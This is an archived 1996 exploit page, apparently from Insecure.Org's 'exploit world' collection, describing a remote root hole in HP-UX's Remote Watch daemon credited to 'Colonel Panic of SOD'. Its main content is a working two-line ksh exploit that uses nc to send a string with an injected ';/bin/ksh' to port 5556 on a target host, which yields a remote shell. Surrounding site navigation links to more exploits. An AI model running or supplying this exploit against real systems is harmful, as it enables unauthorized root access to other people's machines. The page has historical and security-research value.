(Another) SOD HP/UX RemoteWatch hole

Summary
Description:pathetic daemon
Author:Colonel Panic of SOD (sod@command.com.inter.net)
Compromise: root or whatever remwatch runs as (remote!)
Vulnerable Systems:HP/UX with vulnerable Remote Watch running, probably 9.x, maybe 10.x
Date:November 1996
Notes:See the SOD HP Bug of the Week page
Details

Exploit:

#!/bin/ksh
echo ' 11T ;/bin/ksh' | nc $1 5556
# Yup, that's it.  That's the hole.. Believe it.


More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: